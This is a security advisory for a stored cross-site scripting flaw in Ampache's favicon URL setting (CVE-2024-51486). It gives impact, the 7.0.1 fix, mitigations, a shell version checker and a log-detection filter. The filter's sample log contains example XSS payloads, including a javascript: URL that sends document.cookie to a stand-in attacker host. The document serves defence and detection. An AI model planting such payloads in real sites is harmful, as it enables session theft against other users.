CVE-2024-51486

5.5 MEDIUM

📋 TL;DR

This is a stored cross-site scripting (XSS) vulnerability in Ampache's interface configuration that allows authenticated users to inject malicious JavaScript into the favicon URL field. When other users view the affected interface page, the malicious script executes in their browser context. All Ampache instances running vulnerable versions are affected.

💻 Affected Systems

Products:
  • Ampache
Versions: before 7.0.1
Operating Systems: All
Default Config Vulnerable: ⚠️ Yes
Notes: Requires authenticated user access to the interface configuration section.

📦 What is this software?

⚠️ Risk & Real-World Impact

🔴

Worst Case

An authenticated attacker could steal session cookies, perform actions as other users, redirect to malicious sites, or deploy additional payloads to compromise the Ampache server or user systems.

🟠

Likely Case

An authenticated malicious user could steal session tokens to hijack other users' accounts, potentially gaining administrative privileges or accessing sensitive media content.

🟢

If Mitigated

With proper input validation and output encoding, the malicious input would be treated as plain text rather than executable code, preventing any script execution.

🌐 Internet-Facing: HIGH
🏢 Internal Only: MEDIUM

🎯 Exploit Status

Public PoC: ✅ No
Weaponized: UNKNOWN
Unauthenticated Exploit: ✅ No
Complexity: LOW

Exploitation requires authenticated access to the vulnerable configuration interface.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: 7.0.1

Vendor Advisory: https://github.com/ampache/ampache/security/advisories/GHSA-4xw5-f7xm-vpw5

Restart Required: Yes

Instructions:

1. Back up your Ampache configuration and database.
2. Download Ampache 7.0.1 or later from the official repository.
3. Replace the existing installation with the new version.
4. Restart your web server service.

🧯 If You Can't Patch

  • Restrict access to the interface configuration page to trusted administrators only; the bug is only reachable by an authenticated user who can edit that page.
  • Implement a web application firewall (WAF) with XSS protection rules. Treat this as a stopgap: a WAF only blocks payload patterns it recognises and does not remove the missing output encoding.
  • Serve a Content-Security-Policy header that disallows inline script, so an injected payload that reaches the page still cannot execute in users' browsers.

🔍 How to Verify

Check if Vulnerable:

Check if your Ampache version is below 7.0.1 by viewing the version in the web interface footer or checking the CHANGELOG.md file.

Check Version:

grep -i "version" config/ampache.cfg.php

The config_version value in ampache.cfg.php tracks the configuration file format, not the Ampache release, so treat the web interface footer or CHANGELOG.md as the authoritative source for the installed version.

Verify Fix Applied:

After upgrading, verify the version shows 7.0.1 or higher and, on a non-production instance, enter a harmless test payload in the favicon URL field and confirm that it is rendered as plain text (escaped) rather than executed.
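As an added example (not Ampache project code), the following POSIX shell helper compares an installed version string against the 7.0.1 fix release without relying on `sort -V`, and reads the release number from a CHANGELOG.md fed on standard input. It assumes the changelog's newest release appears as a heading of the form `## 7.0.1`; the sample changelog and version strings are constructed for the demonstration.

```shell
#!/bin/sh
# Added example: is an Ampache release below the CVE-2024-51486 fix (7.0.1)?
FIXED_VERSION="7.0.1"

# version_lt A B: return 0 when A is older than B.
# Compares three dot-separated numeric fields; a leading "v" and any
# non-numeric suffix (e.g. "7.0.0-release") are stripped first.
version_lt() {
    a=$(printf '%s' "$1" | sed 's/^v//; s/[^0-9.].*$//')
    b=$(printf '%s' "$2" | sed 's/^v//; s/[^0-9.].*$//')
    # Pad with ".0.0" so every field exists even for "7" or "7.0".
    a="$a.0.0"
    b="$b.0.0"
    i=1
    while [ "$i" -le 3 ]; do
        x=$(printf '%s' "$a" | cut -d. -f"$i")
        y=$(printf '%s' "$b" | cut -d. -f"$i")
        x=${x:-0}
        y=${y:-0}
        [ "$x" -lt "$y" ] && return 0
        [ "$x" -gt "$y" ] && return 1
        i=$((i + 1))
    done
    return 1
}

# ampache_vulnerable VERSION: return 0 when VERSION is below 7.0.1.
ampache_vulnerable() {
    version_lt "$1" "$FIXED_VERSION"
}

# changelog_version: print the first "## X.Y.Z" release heading read on stdin.
# Assumption: Ampache's CHANGELOG.md lists the newest release first in that form.
changelog_version() {
    grep -m1 -E '^## *v?[0-9]+\.[0-9]+\.[0-9]+' | grep -oE '[0-9]+\.[0-9]+\.[0-9]+'
}

# Constructed CHANGELOG.md excerpt used for the demonstration.
SAMPLE_CHANGELOG='# CHANGELOG

## 7.0.1

### Fixed

- Security fixes

## 7.0.0
'

# Demonstration: classify a few constructed version strings.
for v in 6.6.4 7.0.0-release 7.0.1 7.1.0; do
    if ampache_vulnerable "$v"; then
        printf '%s: VULNERABLE (below %s)\n' "$v" "$FIXED_VERSION"
    else
        printf '%s: fixed\n' "$v"
    fi
done
printf 'changelog reports: %s\n' "$(printf '%s' "$SAMPLE_CHANGELOG" | changelog_version)"
```

Run it from the Ampache install directory with `changelog_version < CHANGELOG.md` to get the actual installed release, then pass that string to `ampache_vulnerable`.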

📡 Detection & Monitoring

Log Indicators:

  • Unusual JavaScript patterns in configuration update logs
  • Multiple failed login attempts followed by configuration changes

Network Indicators:

  • Unexpected outbound connections from users' browsers (not the Ampache server itself, since the injected script runs client-side) to unfamiliar external domains after a favicon or interface configuration change, for example to the host named in the new favicon URL

SIEM Query:

source="ampache_logs" AND message="*favicon*" AND (message="*javascript:*" OR message="*<script*")

The parentheses matter: without them the query matches every log line containing "<script", not only favicon changes, and "*<script*" rather than "*<script>*" also catches tags with attributes such as "<script src=...".
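The same logic as the query above, as an added example that is not part of the original page or of Ampache: a shell filter that keeps only log lines mentioning the favicon setting whose new value carries a script-bearing payload. The log lines are constructed for the demonstration and do not reproduce Ampache's real log format; adapt the first `grep` to whatever your instance logs when a preference is updated.

```shell
#!/bin/sh
# Added example: flag favicon configuration changes whose value looks like an
# XSS payload. Reads log lines on stdin, prints the suspicious ones.

# favicon_xss_hits: lines that mention "favicon" AND contain a javascript: URL,
# an HTML tag start, or a data:text/html URL. A plain https URL passes through.
favicon_xss_hits() {
    grep -i 'favicon' | grep -iE 'javascript:|<[a-z]|data:text/html'
}

# Constructed sample log (not real Ampache output): one benign favicon change,
# two malicious ones, and one unrelated preference change.
SAMPLE_LOG=$(cat <<'EOF'
2024-11-01T10:01:02 alice: Updated preference custom_favicon = https://cdn.example.org/favicon.ico
2024-11-01T10:05:44 mallory: Updated preference custom_favicon = javascript:fetch('//evil.example/'+document.cookie)
2024-11-01T10:06:10 mallory: Updated preference custom_favicon = x"><script>alert(document.domain)</script>
2024-11-01T10:07:00 bob: Updated preference theme = dark
EOF
)

# count_hits: number of suspicious lines in the sample, as a bare integer.
count_hits() {
    printf '%s\n' "$SAMPLE_LOG" | favicon_xss_hits | wc -l | tr -d ' '
}

# Demonstration: print the flagged lines and the count (expected: 2).
printf '%s\n' "$SAMPLE_LOG" | favicon_xss_hits
printf 'suspicious favicon changes: %s\n' "$(count_hits)"
```

In production pipe the real log through `favicon_xss_hits` (for example `tail -F /path/to/ampache.log | favicon_xss_hits`) and alert on any output; a legitimate favicon is an `https://` URL and never needs a tag or a `javascript:` scheme.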

🔗 References
